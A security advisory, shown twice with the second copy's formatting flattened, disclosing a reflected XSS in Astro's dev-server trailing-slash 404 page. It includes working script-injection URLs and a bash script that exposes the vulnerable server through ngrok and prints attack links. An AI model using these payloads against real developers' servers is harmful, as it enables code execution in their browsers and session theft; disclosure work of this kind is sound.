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GHSA-w2vj-39qv-7vh7: Astro development server error page vulnerable to reflected Cross-site Scripting

Summary

A Reflected Cross-Site Scripting (XSS) vulnerability exists in Astro’s development server error pages when the trailingSlash configuration option is used. An attacker can inject arbitrary JavaScript code that executes in the victim’s browser context by crafting a malicious URL. While this vulnerability only affects the development server and not production builds, it could be exploited to compromise developer environments through social engineering or malicious links.

Details

Vulnerability Location

https://github.com/withastro/astro/blob/5bc37fd5cade62f753aef66efdf40f982379029a/packages/astro/src/template/4xx.ts#L133-L149

Root Cause

The vulnerability was introduced in commit 536175528 (PR #12994) , as part of a feature to “redirect trailing slashes on on-demand rendered pages.” The feature added a helpful 404 error page in development mode to alert developers of trailing slash mismatches.

Issue: The corrected variable, which is derived from the user-controlled pathname parameter, is directly interpolated into the HTML without proper escaping. While the pathname variable itself is escaped elsewhere in the same file (line 114: escape(pathname)), the corrected variable is not sanitized before being inserted into both the href attribute and the link text.

Attack Vector

When a developer has configured trailingSlash to 'always' or 'never' and visits a URL with a mismatched trailing slash, the development server returns a 404 page containing the vulnerable template. An attacker can craft a URL with JavaScript payloads that will be executed when the page is rendered.

PoC

Local Testing (localhost)

Basic vulnerability verification in local development environment

<details> <summary>Show details</summary>

astro.config.mjs:

import { defineConfig } from 'astro/config';

export default defineConfig({
  trailingSlash: 'never', // or 'always'
  server: {
    port: 3000,
    host: true
  }
});

package.json:

{
  "name": "astro-xss-poc-victim",
  "version": "0.1.0",
  "scripts": {
    "dev": "astro dev"
  },
  "dependencies": {
    "astro": "5.15.5"
  }
}

Start the development server:

npm install
npm run dev

Access the following malicious URL depending on your configuration:

For trailingSlash: 'never' (requires trailing slash):

http://localhost:3000/"></code><script>alert(document.domain)</script><!--/

For trailingSlash: 'always' (no trailing slash):

http://localhost:3000/"></code><script>alert(document.domain)</script><!--

When accessing the malicious URL:

  1. The development server returns a 404 page due to trailing slash mismatch
  2. The JavaScript payload (alert(document.domain)) executes in the browser
  3. An alert dialog appears, demonstrating arbitrary code execution

</details>

Remote Testing (ngrok)

Reproduce realistic attack scenario via external malicious link

<details> <summary>Show details</summary>

Prerequisites: ngrok account and authtoken configured (ngrok config add-authtoken <key>)

Setup and Execution:

#!/bin/bash
set -e

mkdir -p logs

npm i
npm run dev > ./logs/victim.log 2>&1 &

ngrok http 3000 > ./logs/ngrok.log 2>&1 &

sleep 3

NGROK_URL=$(curl -s http://localhost:4040/api/tunnels | grep -o '"public_url":"https://[^"]*' | head -1 | cut -d'"' -f4)
echo ""
echo "=== Attack URLs ==="
echo ""
echo "For trailingSlash: 'never' (requires trailing slash):"
echo "${NGROK_URL}/\"></code><script>alert(document.domain)</script><!--/"
echo ""
echo "For trailingSlash: 'always' (no trailing slash):"
echo "${NGROK_URL}/\"></code><script>alert(document.domain)</script><!--"
echo ""
wait

When a remote user accesses either of the generated attack URLs:

  1. The request is tunneled through ngrok to the local development server
  2. The development server returns a 404 page due to trailing slash mismatch
  3. The JavaScript payload (alert(document.domain)) executes in the user’s browser

Both URL patterns work depending on your trailingSlash configuration (‘never’ or ‘always’).

</details>

Impact

This only affects the development server. Risk depends on how and where the dev server is exposed.

Security impact

  • Developer environment compromise: Visiting a crafted URL can run arbitrary JS in the developer’s browser.
  • Session hijacking: Active developer sessions can be stolen if services are open in the browser.
  • Local resource access: JS may probe localhost endpoints or dev tools depending on browser policies.
  • Supply-chain risk: Malicious packages or CI that start dev servers can widen exposure.

Attack scenarios

  • Social engineering: Malicious link sent to a developer triggers the XSS when opened.
  • Malicious documentation: Attack URLs embedded in issues, PRs, chat, or docs.
  • Dependency/CI abuse: Packages or automation that spawn public dev servers expose many targets.

Remediation

The fix is straightforward and requires escaping the corrected variable before inserting it into the HTML template. The codebase already imports and uses the escape() function from the html-escaper package.

ghsa
#xss#vulnerability#ios#nodejs#js#git#java#auth

Summary

A Reflected Cross-Site Scripting (XSS) vulnerability exists in Astro’s development server error pages when the trailingSlash configuration option is used. An attacker can inject arbitrary JavaScript code that executes in the victim’s browser context by crafting a malicious URL. While this vulnerability only affects the development server and not production builds, it could be exploited to compromise developer environments through social engineering or malicious links.

Details****Vulnerability Location

https://github.com/withastro/astro/blob/5bc37fd5cade62f753aef66efdf40f982379029a/packages/astro/src/template/4xx.ts#L133-L149

Root Cause

The vulnerability was introduced in commit 536175528 (PR #12994) , as part of a feature to “redirect trailing slashes on on-demand rendered pages.” The feature added a helpful 404 error page in development mode to alert developers of trailing slash mismatches.

Issue: The corrected variable, which is derived from the user-controlled pathname parameter, is directly interpolated into the HTML without proper escaping. While the pathname variable itself is escaped elsewhere in the same file (line 114: escape(pathname)), the corrected variable is not sanitized before being inserted into both the href attribute and the link text.

Attack Vector

When a developer has configured trailingSlash to ‘always’ or ‘never’ and visits a URL with a mismatched trailing slash, the development server returns a 404 page containing the vulnerable template. An attacker can craft a URL with JavaScript payloads that will be executed when the page is rendered.

PoC****Local Testing (localhost)

Basic vulnerability verification in local development environment

Show details

astro.config.mjs:

import { defineConfig } from 'astro/config’;

export default defineConfig({ trailingSlash: 'never’, // or ‘always’ server: { port: 3000, host: true } });

package.json:

{ "name": "astro-xss-poc-victim", "version": "0.1.0", "scripts": { "dev": “astro dev” }, "dependencies": { "astro": “5.15.5” } }

Start the development server:

Access the following malicious URL depending on your configuration:

For trailingSlash: ‘never’ (requires trailing slash):

http://localhost:3000/"></code><script>alert(document.domain)</script><!--/

For trailingSlash: ‘always’ (no trailing slash):

http://localhost:3000/"></code><script>alert(document.domain)</script><!--

When accessing the malicious URL:

  1. The development server returns a 404 page due to trailing slash mismatch
  2. The JavaScript payload (alert(document.domain)) executes in the browser
  3. An alert dialog appears, demonstrating arbitrary code execution

Remote Testing (ngrok)

Reproduce realistic attack scenario via external malicious link

Show details

Prerequisites: ngrok account and authtoken configured (ngrok config add-authtoken <key>)

Setup and Execution:

#!/bin/bash set -e

mkdir -p logs

npm i npm run dev > ./logs/victim.log 2>&1 &

ngrok http 3000 > ./logs/ngrok.log 2>&1 &

sleep 3

NGROK_URL=$(curl -s http://localhost:4040/api/tunnels | grep -o ‘"public_url":"https://[^"]*’ | head -1 | cut -d’"’ -f4) echo “” echo “=== Attack URLs ===” echo “” echo “For trailingSlash: ‘never’ (requires trailing slash):” echo “${NGROK_URL}/\"></code><script>alert(document.domain)</script><!–/” echo “” echo “For trailingSlash: ‘always’ (no trailing slash):” echo “${NGROK_URL}/\"></code><script>alert(document.domain)</script><!–” echo “” wait

When a remote user accesses either of the generated attack URLs:

  1. The request is tunneled through ngrok to the local development server
  2. The development server returns a 404 page due to trailing slash mismatch
  3. The JavaScript payload (alert(document.domain)) executes in the user’s browser

Both URL patterns work depending on your trailingSlash configuration (‘never’ or ‘always’).

Impact

This only affects the development server. Risk depends on how and where the dev server is exposed.

Security impact

  • Developer environment compromise: Visiting a crafted URL can run arbitrary JS in the developer’s browser.
  • Session hijacking: Active developer sessions can be stolen if services are open in the browser.
  • Local resource access: JS may probe localhost endpoints or dev tools depending on browser policies.
  • Supply-chain risk: Malicious packages or CI that start dev servers can widen exposure.

Attack scenarios

  • Social engineering: Malicious link sent to a developer triggers the XSS when opened.
  • Malicious documentation: Attack URLs embedded in issues, PRs, chat, or docs.
  • Dependency/CI abuse: Packages or automation that spawn public dev servers expose many targets.

Remediation

The fix is straightforward and requires escaping the corrected variable before inserting it into the HTML template. The codebase already imports and uses the escape() function from the html-escaper package.

References

  • GHSA-w2vj-39qv-7vh7
  • https://nvd.nist.gov/vuln/detail/CVE-2025-64745
  • withastro/astro#12994
  • withastro/astro@790d942
  • https://github.com/withastro/astro/blob/5bc37fd5cade62f753aef66efdf40f982379029a/packages/astro/src/template/4xx.ts#L133-L149

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